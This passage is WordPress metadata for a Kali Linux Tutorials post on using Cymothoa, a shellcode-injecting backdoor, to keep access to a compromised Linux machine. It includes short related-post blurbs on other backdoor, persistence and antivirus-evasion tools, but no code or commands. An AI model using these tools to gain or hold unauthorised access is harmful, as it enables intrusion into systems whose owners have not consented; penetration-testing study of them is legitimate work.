Tutorials","article_published_time":"2018-07-09T06:11:06+00:00","og_image":[{"url":"http:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/Cymothoa-Flow-301x1024.png","type":"","width":"","height":""}],"author":"Ravi Sankar","twitter_card":"summary_large_image","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"Ravi Sankar","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/cymothoa\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/cymothoa\/"},"author":{"name":"Ravi Sankar","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/fc7a437fea63fdc097205621071d5545"},"headline":"Maintaining Access to a Linux Machine Using Cymothoa &#8211; Post Exploitation","datePublished":"2018-07-09T06:11:06+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/cymothoa\/"},"wordCount":1292,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/cymothoa\/#primaryimage"},"thumbnailUrl":"http:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/Cymothoa-Flow-301x1024.png","keywords":["access","baackdoor","injection","kali","kali linux","linux","linux backdoor","maintain","maintaining access","os backdoor","penetration test","pentest","pentesting","post","post exploitation","shellcode","shellcode injection","unix","unix backdoor"],"articleSection":["Post Exploitation","Tutorials"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/cymothoa\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/cymothoa\/","url":"https:\/\/kalilinuxtutorials.com\/cymothoa\/","name":"Maintaining Access to a Linux Machine Using Cymothoa - Post Exploitation - Kali Linux Tutorials","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/cymothoa\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/cymothoa\/#primaryimage"},"thumbnailUrl":"http:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/Cymothoa-Flow-301x1024.png","datePublished":"2018-07-09T06:11:06+00:00","description":"Cymothoa is a post-exploitation tool. It can be used to maintain access to an exploited system. Cymothoa injects a variety of shell codes to processes.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/cymothoa\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/cymothoa\/#primaryimage","url":"http:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/Cymothoa-Flow-301x1024.png","contentUrl":"http:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/Cymothoa-Flow-301x1024.png"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/fc7a437fea63fdc097205621071d5545","name":"Ravi Sankar","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/8dfaba25f81ff33d5b8723d63285a6eaaedfef1c82c23e370efb0a3fe2054613?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8dfaba25f81ff33d5b8723d63285a6eaaedfef1c82c23e370efb0a3fe2054613?s=96&d=mm&r=g","caption":"Ravi Sankar"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ravisankar\/"}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":1867,"url":"https:\/\/kalilinuxtutorials.com\/curate-tool-archived-urls\/","url_meta":{"origin":246,"position":0},"title":"Curate &#8211; A tool for fetching archived URLs","author":"R K","date":"July 9, 2018","format":false,"excerpt":"Curate is a tool for fetching archived URLs and to be rewritten in Go. Curate Initial set-up one-liner This will clone this repository and then move all scripts to \/usr\/local\/bin. $ git clone git@github.com:EdOverflow\/curate.git \\ && cp curate\/curate \/usr\/local\/bin\/ \\ && echo \"You can delete the .\/curate\/ folder now.\" Once\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/04\/button_download.png?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]},{"id":7829,"url":"https:\/\/kalilinuxtutorials.com\/betterbackdoor-backdoor-with-a-multitude-features\/","url_meta":{"origin":246,"position":1},"title":"BetterBackdoor : A Backdoor With A Multitude Of Features","author":"R K","date":"December 26, 2019","format":false,"excerpt":"BetterBackdoor is a backdoor is a tool used to gain remote access to a machine. Typically, backdoor utilities such as NetCat have 2 main functions: to pipe remote input into cmd or bash and output the response. This is useful, but it is also limited. BetterBackdoor overcomes these limitations by\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":6167,"url":"https:\/\/kalilinuxtutorials.com\/absolutezero-python-apt-backdoor\/","url_meta":{"origin":246,"position":2},"title":"AbsoluteZero : Python APT Backdoor","author":"R K","date":"August 12, 2019","format":false,"excerpt":"AbsoluteZero is a Python APT backdoor, optimised for Red Team Post Exploitation Tool, it can generate binary payload or pure python source. The final stub uses polymorphic encryption to give a first obfuscation layer to itself. Deployment AbsoluteZero is a complete software written in Python 2.7 and works both on\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":4096,"url":"https:\/\/kalilinuxtutorials.com\/phantom-evasion\/","url_meta":{"origin":246,"position":3},"title":"Phantom-Evasion : Python AV Evasion Tool Capable to Generate FUD Executable Even With The Most Common 32 bit Metasploit Payload","author":"R K","date":"March 8, 2019","format":false,"excerpt":"Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antivirus evasion an easy task for pentesters through the use\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":31629,"url":"https:\/\/kalilinuxtutorials.com\/demonized-shell\/","url_meta":{"origin":246,"position":4},"title":"Demonized Shell: Advancing Linux Persistence Techniques and Security Implications.","author":"Varshini","date":"January 5, 2024","format":false,"excerpt":"The article \"Demonized Shell: Advancing Linux Persistence Techniques and Security Implications\" goes into great detail about D3m0n1z3dShell, a complex tool made for making things persistent in Linux settings. The opening would probably talk about how this tool is a big step forward in Linux system security and how it has\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg_D_MqBDJEk7bVW486QZaQigu5NqayhGiOF4YOBmBFHtOBvFE9L41LjYFpE11T4KzBsv6cWlNvZFxiA2F4vFo_QL_uVXMFjy_CC8AZ5DWlcB0k5W6UxngX-b9auVZatkKvpCk3wqtSVSEiBg6RobSaJCDil3pkeFUmuN_TqCt_OO77pFjeKaRyo8_GZw\/s16000\/Demonized%20Shell.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg_D_MqBDJEk7bVW486QZaQigu5NqayhGiOF4YOBmBFHtOBvFE9L41LjYFpE11T4KzBsv6cWlNvZFxiA2F4vFo_QL_uVXMFjy_CC8AZ5DWlcB0k5W6UxngX-b9auVZatkKvpCk3wqtSVSEiBg6RobSaJCDil3pkeFUmuN_TqCt_OO77pFjeKaRyo8_GZw\/s16000\/Demonized%20Shell.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg_D_MqBDJEk7bVW486QZaQigu5NqayhGiOF4YOBmBFHtOBvFE9L41LjYFpE11T4KzBsv6cWlNvZFxiA2F4vFo_QL_uVXMFjy_CC8AZ5DWlcB0k5W6UxngX-b9auVZatkKvpCk3wqtSVSEiBg6RobSaJCDil3pkeFUmuN_TqCt_OO77pFjeKaRyo8_GZw\/s16000\/Demonized%20Shell.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg_D_MqBDJEk7bVW486QZaQigu5NqayhGiOF4YOBmBFHtOBvFE9L41LjYFpE11T4KzBsv6cWlNvZFxiA2F4vFo_QL_uVXMFjy_CC8AZ5DWlcB0k5W6UxngX-b9auVZatkKvpCk3wqtSVSEiBg6RobSaJCDil3pkeFUmuN_TqCt_OO77pFjeKaRyo8_GZw\/s16000\/Demonized%20Shell.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg_D_MqBDJEk7bVW486QZaQigu5NqayhGiOF4YOBmBFHtOBvFE9L41LjYFpE11T4KzBsv6cWlNvZFxiA2F4vFo_QL_uVXMFjy_CC8AZ5DWlcB0k5W6UxngX-b9auVZatkKvpCk3wqtSVSEiBg6RobSaJCDil3pkeFUmuN_TqCt_OO77pFjeKaRyo8_GZw\/s16000\/Demonized%20Shell.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg_D_MqBDJEk7bVW486QZaQigu5NqayhGiOF4YOBmBFHtOBvFE9L41LjYFpE11T4KzBsv6cWlNvZFxiA2F4vFo_QL_uVXMFjy_CC8AZ5DWlcB0k5W6UxngX-b9auVZatkKvpCk3wqtSVSEiBg6RobSaJCDil3pkeFUmuN_TqCt_OO77pFjeKaRyo8_GZw\/s16000\/Demonized%20Shell.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":3636,"url":"https:\/\/kalilinuxtutorials.com\/remot-3d-tool-large-pentesters\/","url_meta":{"origin":246,"position":5},"title":"Remot3d &#8211; A Simple Tool Created For Large Pentesters","author":"R K","date":"January 23, 2019","format":false,"excerpt":"Remot 3d is a simple tool created for large pentesters as well as just for the pleasure of defacers to exploit a system or server that runs a PHP program language. It's easy to create a backdoor in an instant, the backdoor can be used in a remote process via\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/246","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=246"}],"version-history":[{"count":0,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/246\/revisions"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=246"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=246"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=246"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}